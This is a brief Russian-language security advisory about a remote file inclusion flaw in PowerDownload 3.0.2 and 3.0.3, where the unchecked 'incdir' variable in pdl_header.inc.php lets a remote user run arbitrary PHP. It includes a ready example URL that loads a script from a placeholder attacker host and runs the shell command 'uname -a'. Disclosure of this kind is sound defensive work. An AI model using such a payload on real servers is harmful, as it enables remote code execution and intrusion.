Программа: PowerDownload 3.0.2, 3.0.3

Уязвимость позволяет удаленному
пользователю выполнить произвольные
команды на целевой системе. Уязвимость
существует из-за недостаточной проверки
входных данных в переменной ‘incdir’ сценария ‘pdl-inc/pdl_header.inc.php’.
Удаленный пользователь может с помощью
специально сформированного URL выполнить
произвольный php файл.

Пример:

http://[target]/download/downloads.php?release_id= 650&incdir=http://[attacke]/cmd.gif?&cmd=uname%20-a



Оставить мнение